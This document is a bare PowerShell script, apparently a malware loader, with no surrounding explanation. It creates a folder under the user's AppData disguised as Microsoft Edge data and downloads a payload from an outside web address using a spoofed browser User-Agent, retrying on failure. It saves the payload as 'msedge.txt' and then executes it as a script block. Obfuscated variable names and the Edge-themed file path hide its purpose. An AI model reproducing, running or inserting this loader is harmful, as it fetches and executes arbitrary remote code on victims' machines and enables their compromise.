# b8efcd41795ee0a61305efd6e1209ca8 $mhc=Join-Path $env:APPDATA 'Microsoft\Edge' if(!(Test-Path $mhc)){New-Item $mhc -ItemType Directory -Force|Out-Null} $cbt=Join-Path $mhc 'msedge.txt' $zgpl='https://cdns-static-files.com/proteger.php' $xtc=New-Object Net.WebClient $xtc.Headers.Add('User-Agent','Mozilla/5.0') $shew='' for($gr=0;$gr -lt 3;$gr++){ try{$shew=$xtc.DownloadString($zgpl) if($shew.Length -gt 500){break}} catch{Start-Sleep 2}} if($shew.Length -gt 500){ [IO.File]::WriteAllText($cbt,$shew,[Text.Encoding]::UTF8) & ([ScriptBlock]::Create($shew)) -ScriptPath $cbt }